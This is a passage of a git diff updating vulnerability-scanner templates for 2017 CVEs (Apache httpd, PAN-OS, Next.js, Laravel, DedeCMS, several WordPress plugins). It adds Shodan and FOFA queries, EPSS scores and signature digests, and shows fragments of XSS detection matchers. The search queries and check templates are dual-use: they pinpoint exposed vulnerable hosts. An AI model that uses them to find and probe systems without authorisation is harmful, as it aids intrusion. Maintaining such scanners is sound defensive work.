4b0a00483046022100d24d22a1cb3faec3366b57b8dbfa41642ebe1edf9ea030d6be399c7e13235dba022100bad23fce4b4a160d392284f9c0d6801f889143bcc01bac423b6cb519c33403ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c0006e2859428861ac83e645dd91632ebad9b3a16a76fa2d38689f71ed1b7bea022100f1be24e96e715c1448270af7e94365b6ecda3ffb6dec61ccc86a133b922c0da8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index cae97e7f8a..f225164309 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: apache product: http_server + shodan-query: + - cpe:"cpe:2.3:a:apache:http_server" + - apache 2.4.49 tags: cve,cve2017,apache,httpd,fileupload,vulhub,intrusive http: @@ -56,4 +59,4 @@ http: - type: dsl dsl: - 'contains(body_2, "{{randstr_1}}")' -# digest: 4b0a00483046022100ae5641ddd92e3d444dbbb35c3b15e833ad880957167aa6fad3e696b3f05e57d6022100a1460cf01679d7a517dba54d83abe3fa648044075c4c3c88058ee7687bb5a231:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022072e8c81a95fccbba2c0817ef63de9fd716deffc4300335149cd6b5a986f1d221022100d8ff9ec6b4e97346e457d818b3369eeb7b6cba021aeefffe70baa0910691dafc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index 7b6d9d5a2a..2cd491169f 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -20,12 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2017-15944 epss-score: 0.97314 - epss-percentile: 0.99866 + epss-percentile: 0.99875 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: paloaltonetworks product: pan-os + shodan-query: + - http.favicon.hash:"-631559155" + - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" + fofa-query: icon_hash="-631559155" tags: cve2017,cve,kev,edb,rce,vpn,panos,globalprotect,paloaltonetworks http: @@ -45,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e0ebb82c78017bace95bb6bdbbd956c0ceefa723b30e23eaf66e133c3671020b02201e43c7c0e0a433896c4df5cfcc72d35bc21c5ead69bbb1c20e4903dc8d6705a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ae014c9cd32c5d29942aef4f4c2421bbf24673029ab3c22975a80b7f552e92cd022100be2a31f1a1451ef20600772d89019ec838346b70a0fc0bcc57c3e69f19569331:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index 95bebe1838..00fbc8046d 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-16806 cwe-id: CWE-22 epss-score: 0.07105 - epss-percentile: 0.93842 + epss-percentile: 0.93981 cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:* metadata: max-request: 2 @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200ba4a0e6757347a8f45e93acf626f6b963960f94fc7cb1934493fe84196f558602205b4f7a68184fc2f970c513193e6955898cadf0658f112d2d32e77c5af8eeb3ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220248d3a025910d7531fbfc6d9b3fa5dc68f2b52eb6ee83db505034ca0c5eaf5b6022073f53caec34066a4d897600b5ab38dd8983378f8db55127c30cc96bc041d373e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index 8904a4eeb1..2d841c6509 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -14,18 +14,23 @@ info: - https://github.com/zeit/next.js/releases/tag/2.4.1 - https://nvd.nist.gov/vuln/detail/CVE-2017-16877 - https://github.com/vercel/next.js/commit/02fe7cf63f6265d73bdaf8bc50a4f2fb539dcd00 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-16877 cwe-id: CWE-22 epss-score: 0.00337 - epss-percentile: 0.68302 + epss-percentile: 0.71295 cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zeit product: next.js + shodan-query: + - http.html:"/_next/static" + - cpe:"cpe:2.3:a:zeit:next.js" + fofa-query: body="/_next/static" tags: cve,cve2017,nextjs,lfi,traversal,zeit http: @@ -44,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c250b9c908590d5296d8fd48225795617103cff1b0a0082f49eccc4317ef7c2e022100f718c49e8cd4c13a059b632b35040a5391bb6a6714822a1348371aa8b2d51137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210091e1659aa1ea73b0c2a79a5a96a546013d45d612451c5fde63cd376044efbc04022100c0d6d79d63d1ae7522504b96170dfe21f937963d98b3849fc2d4df3b391bd19e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index 27c7657e3b..c3d23df425 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: laravel product: laravel - shodan-query: Laravel-Framework - fofa-query: app="Laravel-Framework" + shodan-query: + - Laravel-Framework + - cpe:"cpe:2.3:a:laravel:laravel" + - laravel-framework + fofa-query: + - app="Laravel-Framework" + - app="laravel-framework" tags: cve,cve2017,laravel,exposure,packetstorm http: @@ -56,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a541924b65a67b00842f8a25418a80364b6d61f929707787057785e26f98d3b002205403d069324b4a48da8c6cba4b38fc4d1c04a8a1510526608e59a4bcab70e57e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e844fde3edb6cce52d63d6465509d56be598412ecc7a783c99f95e5048fa0b28022000e7f92703c7e0130e41822de0a042d152f2ca780d45bb758994da36ee747c8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 1bcbc76088..36251f3bd6 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -21,15 +21,14 @@ info: cve-id: CVE-2017-17043 cwe-id: CWE-79 epss-score: 0.00245 - epss-percentile: 0.63923 + epss-percentile: 0.64551 cpe: cpe:2.3:a:zitec:emag_marketplace_connector:1.0.0:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: zitec - product: emag_marketplace_connector + product: "emag_marketplace_connector" framework: wordpress tags: cve,cve2017,xss,wp-plugin,packetstorm,wordpress,zitec - flow: http(1) && http(2) http: @@ -62,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203013773f07b32293d187ef5593c809c0d5b199d0535add43a30b9558d54ad34b0220793cad7ec1c8c9661bbcec6319fcac9cd92006ed78d1f46ccc76dca5de51cb18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f37d207ab9fe28db5cc54d5091aa2f39e53ef420fccc617f721d87db566ca083022100b13d1e3354b033f80ad09b7f37a5236a4ef7bfefffa8c0293880551a5c2fe2c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 281396a53a..ffbe822137 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -13,21 +13,21 @@ info: - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1 - https://packetstormsecurity.com/files/145044/WordPress-amtyThumb-8.1.3-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2017-17059 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-17059 cwe-id: CWE-79 - epss-score: 0.00261 - epss-percentile: 0.63794 + epss-score: 0.00242 + epss-percentile: 0.642 cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: amtythumb_project + max-request: 2 + vendor: "amtythumb_project" product: amtythumb framework: wordpress tags: cve2017,cve,xss,wp-plugin,packetstorm,wordpress,amtythumb_project - flow: http(1) && http(2) http: @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022074f0b24a9cb480e81960e319cc7ee19b77dec9226fe67fb84ef549e875531ccb022100d2da121efbde5f1678796a09a5a402923ee1a4b01df208e0d978251d20b71f1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207165561de2b8f1a952c469829aebbb12531a91fa1278fec5395300eab35aa65602210095f1fa0f9ead77f9384a3fe37c498242d9bd2c4efee9a3b8c302a6b2c0fcd11d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 700e1be344..c1d8804745 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -21,15 +21,14 @@ info: cve-id: CVE-2017-17451 cwe-id: CWE-79 epss-score: 0.00178 - epss-percentile: 0.55144 + epss-percentile: 0.54962 cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: wpmailster - product: wp_mailster + product: "wp_mailster" framework: wordpress tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm,wpmailster - flow: http(1) && http(2) http: @@ -63,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ec046f9a81c101fb374ae81bf7e992adeec3cc8e98a3583295368cde81c2129e022100a1232b8f02f87a0a260815390cb7e841d202487f1b339d81ed1212cc8af179de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204e068d0539ecee04f2481d70422e15a9e52dd17391199978553edbafcc5a2970022100e7b49d9fc769c172e283c3a4e07be4d9930e573a45111367e2166ae7b1ee308d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index 4bfef0fdf6..364410874d 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -28,6 +28,7 @@ info: max-request: 65 vendor: embedthis product: goahead + shodan-query: cpe:"cpe:2.3:a:embedthis:goahead" tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub,embedthis http: @@ -117,4 +118,4 @@ http: - type: status status: - 200 -# digest: 480a004530430220137571f29820e7cfeff24983e553083fbd48df32ed6c9f6be7ab7a0b2ab3dcec021f1cf2aba6f6d18369d6d6d6784a620d36863b9446b26c941818edd6a6a12322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a0718d9f04bc6d15d22ac54b93c6f567b67f15d01f50cee17d7f3571416b85140220106a40ed475fcb76830332c3c1044593fc378ecc06198d8f747cee8305851a5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index cd12b0eaf6..11918b1c3e 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -21,15 +21,21 @@ info: cvss-score: 9.8 cve-id: CVE-2017-17731 cwe-id: CWE-89 - epss-score: 0.02129 - epss-percentile: 0.88972 + epss-score: 0.04196 + epss-percentile: 0.92213 cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dedecms product: dedecms - shodan-query: http.html:"DedeCms" - fofa-query: app="DedeCMS" + shodan-query: + - http.html:"DedeCms" + - cpe:"cpe:2.3:a:dedecms:dedecms" + - http.html:"dedecms" + fofa-query: + - app="DedeCMS" + - app="dedecms" + - body="dedecms" tags: cve,cve2017,sqli,dedecms variables: num: "999999999" @@ -49,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ba551e3088d97f8d462ef4b105c0dc9c4bc6cef870e1e5898d660c13360a9c79022068cf574ec431237b66a83d1398a8b348cbcf96e48a36b441e77089f600452268:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206e5dc37a03a4868f0fef5d07a4800f237ce2f7a038ad853626cf727326cc3ac5022100f332e6f87622332871e8e9644f798d50696bf98563415c9e012f9e6551995a06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index bf8b0e1e71..bc4ace9258 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -29,6 +29,10 @@ info: max-request: 1 vendor: kentico product: kentico_cms + shodan-query: + - cpe:"cpe:2.3:a:kentico:kentico_cms" + - http.title:"kentico database setup" + fofa-query: title="kentico database setup" google-query: intitle:"kentico database setup" tags: cve2017,cve,kentico,cms,install,unauth,edb @@ -51,4 +55,4 @@ http: - "Database Setup" - "SQLServer" condition: and -# digest: 4a0a00473045022100ad66c367e331e508a9f4b8fa4a02f983e9f099aeadd13065ad5c5afce55ef49c022066cea12a22089ef4211b14cd43c45a6ee5a3d7ba24ae488ba1f0f9d108f68fcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008739f90b1c6a48e8d17547762c5afc7a690a6a78ae2dc27a39f71df9d48903fe02204e81c6b154e63aefd757e8d2fa6f74e3cc3e0db9b37ac194cdeff535bce03a65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index 3f5b40e325..4e6e16b60b 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2017-18024 cwe-id: CWE-79 epss-score: 0.00074 - epss-percentile: 0.30209 + epss-percentile: 0.31612 cpe: cpe:2.3:a:avantfax:avantfax:3.3.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: avantfax product: avantfax + shodan-query: http.title:"avantfax - login" + fofa-query: title="avantfax - login" + google-query: intitle:"avantfax - login" tags: cve,cve2017,avantfax,hackerone,packetstorm,xss http: @@ -55,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e15727b0ddf652065861bf22bea1c0e93ae8134932a63f1691a2256adbd1b25602201f24ab36ca2f64094ec81fa3f92890da072058fd9f23c5802569ecd06afcb00c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bf464ae1865ebdfc07eca5805af2e4ef8b10d1f7751f62adb5de2c0c9476687602207e8e107717c8972c0c2a91ccf68984488b5bf04de54c3e3bdfd1598beacbf8af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml index 8f9ac61405..be4405b8cf 100644 --- a/http/cves/2017/CVE-2017-18487.yaml +++ b/http/cves/2017/CVE-2017-18487.yaml @@ -25,6 +25,8 @@ info: vendor: google_adsense_project product: google_adsense framework: wordpress + shodan-query: http.html:/wp-content/plugins/adsense-plugin/ + fofa-query: body=/wp-content/plugins/adsense-plugin/ publicwww-query: "/wp-content/plugins/adsense-plugin/" tags: cve,cve2017,wordpress,wpscan,wp-plugin,xss,bws-adpush,authenticated,google_adsense_project @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Google AdSense")' condition: and -# digest: 4a0a00473045022100ac224191317b7f9d5c8305933b2f932fc9c11bbb1d356f807a34412326386f6002201ffc830ad1f53205651cbf36c8e55b45f44beea9ded57833044904fb6736187e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d296b30723a036063df5274c1ec0cb9a6d1f04b7274fe76a1a1dc2fc64a65d77022100d7551c262ffb89bfb53d7f8179f241c1217f3aeacbf9e14f390ca5f54b11e323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml index bcbe1eff61..21a5c0aa3c 100644 --- a/http/cves/2017/CVE-2017-18490.yaml +++ b/http/cves/2017/CVE-2017-18490.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18490 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:contact_form_multi:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: contact_form_multi framework: wordpress + shodan-query: http.html:/wp-content/plugins/contact-form-multi/ + fofa-query: body=/wp-content/plugins/contact-form-multi/ publicwww-query: "/wp-content/plugins/contact-form-multi/" tags: cve,cve2017,wordpress,bws-contact-form,wpscan,wp-plugin,xss,authenticated,contact-form-multi,bestwebsoft @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form Multi by")' condition: and -# digest: 490a00463044022047a86d472b4963557d6bdde6b11f2b646e6313f13a90a273e1fce430e894092102205e15a23b0220c1cbb8df6bccb36fd1346acd96b67121cd1349c4c4016415f034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022035b9ebb67781a9f92fbabbed5992a1bd1f5a8d14632e665f682a6bab6f449bac022100e205545161e60b4b7cd3884a30b89e7886e8b645ee348bbe83d75e9daf373012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18491.yaml b/http/cves/2017/CVE-2017-18491.yaml index 73517d0595..86ae243d98 100644 --- a/http/cves/2017/CVE-2017-18491.yaml +++ b/http/cves/2017/CVE-2017-18491.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18491 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:contact_form:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: contact_form framework: wordpress + shodan-query: http.html:/wp-content/plugins/contact-form-plugin/ + fofa-query: body=/wp-content/plugins/contact-form-plugin/ publicwww-query: "/wp-content/plugins/contact-form-plugin/" tags: cve,cve2017,wordpress,bws,contact-form,wpscan,wp-plugin,xss,authenticated,bestwebsoft @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form by")' condition: and -# digest: 490a00463044022022aaa77f0654980937b928d490f572e59c3e40755b874d4e7ff6a7168136202b02203fcd59db42dff8780151fd38459c2b921a77502f91ff4c72364ad218117af4d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a531798f7a02de0d10e1674038fc01dde9c312d6a8e5a42525892fc1a69d1ff30220249bfed91327aa2ce38d13f9fa066b36f0791b217b8f7bfd625ce74180ce68c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml index c7fa05e53a..e21107c146 100644 --- a/http/cves/2017/CVE-2017-18492.yaml +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: contact_form_to_db framework: wordpress + shodan-query: http.html:/wp-content/plugins/contact-form-to-db/ + fofa-query: body=/wp-content/plugins/contact-form-to-db/ publicwww-query: "/wp-content/plugins/contact-form-to-db/" tags: cve2017,cve,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated,bestwebsoft @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form to DB by")' condition: and -# digest: 4a0a004730450221009117b9d4328ea3a5d94d9ecd68c3c1402e95a82c3b7f5946adaf2c0210a7dd9302203ec8c8a43e1798ce9f668234b12d6d47f7b08c68abd2f858016c8b168794db62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a811b54fa65cdad8be00d6d92397705da1b9063b6a59665a6715a66c0b84a7c602201ec9474bf2f76977a1de15bfd3ca2c9d706ac5864862d9961f7536936cc3c660:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml index 0d6b511623..ee7fc173a2 100644 --- a/http/cves/2017/CVE-2017-18493.yaml +++ b/http/cves/2017/CVE-2017-18493.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18493 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:custom_admin_page:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: custom_admin_page framework: wordpress + shodan-query: http.html:/wp-content/plugins/custom-admin-page/ + fofa-query: body=/wp-content/plugins/custom-admin-page/ publicwww-query: "/wp-content/plugins/custom-admin-page/" tags: cve,cve2017,wordpress,bws-adminpage,wpscan,wp-plugin,xss,authenticated,bestwebsoft @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Custom Admin Page by")' condition: and -# digest: 4b0a00483046022100a8f985f73aa53f158d7b69dc00405ae8393492e82583cda9393d45d6e09b86df022100f47e60f2df1bbdfee0a7a9497bda25b96739c2c69f49f2d8b587082bc45df3b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d25f974df99c734174ac585afbe9e0fc0958f81c020aec928cc4395342edee10022100e343c554441703210dfc2ed4b0b85a002e9e42ff542dd5201b3d67ffd037d6e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18494.yaml b/http/cves/2017/CVE-2017-18494.yaml index f35075d372..4dbc72abdb 100644 --- a/http/cves/2017/CVE-2017-18494.yaml +++ b/http/cves/2017/CVE-2017-18494.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18494 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36857 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:custom_search:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: custom_search framework: wordpress + shodan-query: http.html:/wp-content/plugins/custom-search-plugin/ + fofa-query: body=/wp-content/plugins/custom-search-plugin/ publicwww-query: "/wp-content/plugins/custom-search-plugin/" tags: cve,cve2017,wordpress,bws-custom-search,wpscan,wp-plugin,xss,authenticated,bestwebsoft @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Custom Search by")' condition: and -# digest: 4b0a00483046022100f9cc3cc8539a1d411d5a0fc2255808c1742059f86723ee77d65a025201fb801e022100d596c70a28642269afc2cafe1fecf0ff789694b8d7407ac813fd2a6adb176d89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b639822c174a65c5d0cfba84f95f20d33446bf68dd62533bec8d3976557571c2022039af2ae78857a1b7f7bac73c7f570714c71a244fee97092fc751531e7f94e13b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18496.yaml b/http/cves/2017/CVE-2017-18496.yaml index 9cd3d64dfa..803363008f 100644 --- a/http/cves/2017/CVE-2017-18496.yaml +++ b/http/cves/2017/CVE-2017-18496.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18496 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36836 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:htaccess:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: htaccess framework: wordpress + shodan-query: http.html:/wp-content/plugins/htaccess/ + fofa-query: body=/wp-content/plugins/htaccess/ publicwww-query: "/wp-content/plugins/htaccess/" tags: cve,cve2017,wordpress,wpscan,bws-htaccess,wp-plugin,xss,authenticated,bestwebsoft @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Htaccess by")' condition: and -# digest: 4b0a0048304602210083bbc08d8af961271e098a1736c206c3ef81fc9a67b9886fc1185988a4a8d5310221008313ab9d0915cea1add617dcb62ca6f423209ab3d00216d25b0440fe803c5b40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206cebed1d2cfcbba886f3bb89acf666468d9abd47f636e8dcbab195de7bcedc5d02204b1a649f3eb5ccdbeaea8266f4fb5b82ce65cf8fa7d581a86302a6a500b9893b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml index d1554790f4..65202a6009 100644 --- a/http/cves/2017/CVE-2017-18500.yaml +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18500 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.60522 + epss-percentile: 0.61183 cpe: cpe:2.3:a:bestwebsoft:social_buttons_pack:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: social_buttons_pack framework: wordpress + shodan-query: http.html:/wp-content/plugins/social-buttons-pack/ + fofa-query: body=/wp-content/plugins/social-buttons-pack/ publicwww-query: "/wp-content/plugins/social-buttons-pack/" tags: cve2017,cve,wordpress,wpscan,bws-social-buttons,wp-plugin,xss,authenticated,bestwebsoft @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Social Buttons Pack by")' condition: and -# digest: 4a0a00473045022100f89fb19d15fb08118427dcbbec861334e2869b19a7f7629f950880a2b1a030a402204c072011a5c2993febfb3b7ebae8ee5904fd3f1ab56497f1dbfcdc2b0383083d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210097d2ba84eda3054b5bbf7ff6e09c950d1472e99f14f1363222b0100fe8faeb7302207885d27d9bb4d1300e2d67f44f7cfd5dd474403f79b456c86c6e97876e5e2346:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml index 7f84a097f0..56ff4d6858 100644 --- a/http/cves/2017/CVE-2017-18501.yaml +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18501 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.60522 + epss-percentile: 0.61183 cpe: cpe:2.3:a:bestwebsoft:social_login:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: social_login framework: wordpress + shodan-query: http.html:/wp-content/plugins/social-login-bws/ + fofa-query: body=/wp-content/plugins/social-login-bws/ publicwww-query: "/wp-content/plugins/social-login-bws/" tags: cve2017,cve,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated,bestwebsoft @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Social Login by")' condition: and -# digest: 4a0a00473045022100afda914e7e9726b246e585b8f4faa2ff861c17837ff01ded7c22cbaf1e4ea39e02205a4ecb7f7af6fbd5809cb254f685cee642439232493671b38962a87dfed0b84e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a57b57e66eb384072150b5c6a840119397131570efa67a7f9c2e40d712e108a8022006dd891ccbe7310686e9fef74e5ef7c8e36a2636cb38ac1cf34bdbf780eee92d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml index c6c6d10ba6..51b287284b 100644 --- a/http/cves/2017/CVE-2017-18502.yaml +++ b/http/cves/2017/CVE-2017-18502.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18502 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.61251 + epss-percentile: 0.61183 cpe: cpe:2.3:a:bestwebsoft:subscriber:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: subscriber framework: wordpress + shodan-query: http.html:/wp-content/plugins/subscriber/ + fofa-query: body=/wp-content/plugins/subscriber/ publicwww-query: "/wp-content/plugins/subscriber/" tags: 